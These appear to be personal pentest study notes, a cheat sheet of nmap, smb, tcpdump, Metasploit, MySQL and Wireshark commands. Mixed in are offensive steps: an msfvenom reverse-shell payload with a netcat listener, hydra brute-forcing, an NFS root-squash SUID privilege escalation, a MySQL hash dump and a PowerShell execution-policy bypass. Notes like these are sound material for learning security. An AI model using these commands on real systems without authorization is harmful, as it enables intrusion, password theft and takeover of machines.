# Pentest - Commands and Tools ping \<IP or domain\> traceroute \<IP or domain>(linux) -I (flag ICMP, UDP by default) tracert \<IP or domain\> (windows) whois \<domain\> (linux) --> sudo apt update && sudo apt-get install whois dig \<domain\> @\<dns-server-ip\> > dig gives us is the TTL (Time To Live) of the queried DNS record. As mentioned previously, when your computer queries a domain name, it stores the results in its local cache. The TTL of the record tells your computer when to stop considering the record as being valid telnet ip port Google DNS: 8.8.8.8 or 8.8.4.4 ## dig Check DMARC record ```bash dig _dmarc.<yourdomain> TXT +short ``` ## ssh ssh username@hostname -i /pathto/id_rsa (id_rsa = privatekey) ## smb smbclient //ip/share -U Anonymous -p port (port could be the default 143) enum4linux ``` enum4linux -a $ip | tee enum4linux-$ip.out ``` smbmap while read i; do smbmap -H $i 2>/dev/null; done < <Target IP File> | grep -v Finding | grep -v Authentication ## nmap General Scan nmap -sV --script vuln -oN nmap-$ip.out $ip * -sV: service/version scan * --script vuln: run a script scan with the vuln scripts. * -oN nmap-$ip.out: output in normal format to the file nmap --script safe -p- -oN nmap-$ip.out $ip * -p-: all ports * --script safe: run a script scan with the vuln scripts. * -oN nmap-$ip.out: output in normal format to the file nmap -A -p- -oN nmap-$ip.out $ip * -p-: all ports * -A: Enable OS detection, version detection, script scanning, and traceroute * -oN nmap-$ip.out: output in normal format to the file nmap -A -p- -Pn -oN nmap-$ip.out $ip * -A: Enable OS detection, version detection, script scanning, and traceroute * -p-: all ports * -Pn: skip the Nmap discovery stage * -oN nmap-$ip.out: output in normal format to the file ## Windows * lusrmgr.msc - Local User and Group Management ## tcpdump https://danielmiessler.com/study/tcpdump/ use with sudo ```bash tcpdump ip proto \\icmp -i tun0 tcpdump -D #show interfaces tcpdump -i lo #select interface tcpdump -i lo -XA #hexadecimal & ASCII tcpdump -r -n file.pcap -A host X.X.X.X and port XXXX #read a previous capture, (-n) not resolves hostnames, filter by host, port, show payload as ASCII tcpdump -w #write the data to a file tcpdump -r -n file.pcap ip6 # search specific protocols, as ipv6 tcpdump -r -n file.pcap net 192.168.99.0/24 #search network ranges ``` ## netcat ```bash nc -l -p XXXX # -l listenig -p port ``` ```bash nc IP port #to connect ``` ## telnet telnet ip port ## msfvenom ### reverse shell for telnet on unix msfvenom -p cmd/unix/reverse_netcat lhost=localIP lport=4444 R * -p = payload * lhost = our local host IP address (this is your machine's IP address) * lport = the port to listen on (this is the port on your machine) * R = export the payload in raw format nc -lvp [listening port] * -l: listen mode, for inbound connects * -v: verbose * -p: specify the local port (in our case, the port we are listening to) ## hydra hydra -t 4 -l user -P /usr/share/wordlists/rockyou.txt -vV [IP] [protocol] * -t 4: Number of parallel connections per target * -l [user]: Points to the user who's account you're trying to compromise * -P [path to dictionary]: Points to the file containing the list of possible passwords * -vV: Sets verbose mode to very verbose, shows the login+pass combination for each attempt * [IP]: The IP address of the target machine * [protocol] : Sets the protocol, ex: ftp, ssh ## NFS list the NFS shares showmount -e IP mount a share in our local machine Create a temp dir mkdir /tmp/mount Then sudo mount -t nfs $IP:home /tmp/mount/ -nolockRun * mount : Execute the mount command * -t nfs : Type of device to mount, then specifying that it's NFS * IP:share : The IP Address of the NFS server, and the name of the share we wish to mount * nolock : Specifies not to use NLM locking Exploit NFS Share Root Squashing disable or misconfigured * NFS Access \-\> * Gain Low Privilege Shell \-\> * Upload Bash Executable to the NFS share \-\> * Set SUID Permissions Through NFS Due To Misconfigured Root Squash \-\> * Login through SSH \-\> * Execute SUID Bit Bash Executable \-\> * ROOT ACCESS Note: Before copied -> The copied bash shell must be owned by a root user: sudo chown root bash After copied -> sudo chmod +sx bash ## Metasploit msfconsole : to start metasploit search [module_name] : search for a module use [module_name] : use module options : display module options set [variable] : set variale of module run : run the module info : show info of the module ## MySQL `sudo apt install default-mysql-client` connecto to BD `mysql -h [IP] -u [username] -p` enumerate user with nmap `nmap --script mysql-enum [target]` metasploit auxiliary/admin/mysql/mysql_sql This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials. auxiliary/scanner/mysql/mysql_schemadump This module extracts the schema information from a MySQL DB server (dump tables/column names) auxiliary/scanner/mysql/mysql_hashdump This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. ## John the Riper john [file-with-hash] ## Wireshark `apt install wireshark` Filtering * and - operator: and / \&\& * or - operator: or / || * equals - operator: eq / == * not equal - operator: ne / != * greater than - operator: gt / \> * less than - operator: lt / \< ip.addr ip.src ip.dst tcp.port eq [Port#] or [Protocol Name] udp.port eq [Port#] or [Protocol Name] ### ARP packets Request (1) Opcode: request (1) Reply (2) Opcode: reply (2) Filter arp.opcode == 1 arp.opcode == 2 arp.src.hw_mac == <80:fb:06:f0:45:d7> arp.dst.proto_ipv4 : To find IP for specific MAC ### ICMP Packets Type: 8 (Echo (ping) request) -> A type that equals 8 means that it is a request packet Type: 0 (Echo (ping) reply) -> A type that equals 0 it is a reply packet. :::warning When these codes are altered or do not seem correct that is typically a sign of suspicious activity. check timestamp data string which will typically just be a random data string. ::: ### TCP Packets TCP packets, Wireshark can be very helpful and color code the packets in order of danger level. Check the sequence number and acknowledgment number. Within Wireshark, we can also see the original sequence number by navigating to edit > preferences > protocols > TCP > relative sequence numbers (uncheck boxes). :::info Tools like RSA NetWitness and NetworkMiner to filter out ::: :::warning Typically when this handshake is out of order or when it includes other packets like an RST packet, something suspicious or wrong is happening in the network. ::: ### DNS Packets To analyze * what it is querying * the answer of the query: can be used to verify the query :::warning where the query is originating from: it is UDP 53 which means that this packet passes that check, if it was TCP 53 then it should be considered suspicious traffic and needs to analyzed further ::: ### HTTP Traffic User-agent Request URI File Data Host Response :::info Statistics > Protocol Hierarchy : to organize the protocols present in a capture the Protocol Hierarchy Statistics > Endpoints : This feature allows the user to organize all endpoints and IPs found within a specific capture File > Export Objects > HTTP : allow us to organize all requested URIs in the capture ::: ### HTTPS Traffic Before sending encrypted information the client and server need to agree upon various steps in order to make a secure tunnel. 1. Client and server agree on a protocol version 1. Client and server select a cryptographic algorithm 1. The client and server can authenticate to each other; this step is optional 1. Creates a secure tunnel with a public key unencrypted data Edit > Preferences > Protocols > TLS > [+] IP Address: 127.0.0.1 Port: start_tls Protocol: http Keyfile: RSA key location ## Powershell Load a powershell shell with execution policy bypassed ```` powershell -ep bypass ```` Execute a ps script ```` ./Script.ps1 ```` Load a ps module in the current scope ```` . ./Script.ps1 ```` ## Active Directory Enumeration Power View https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview Search specific property ```` Get-NetUser | ?{$_.property -match 'Domain Admins'} ```` ## SHODAN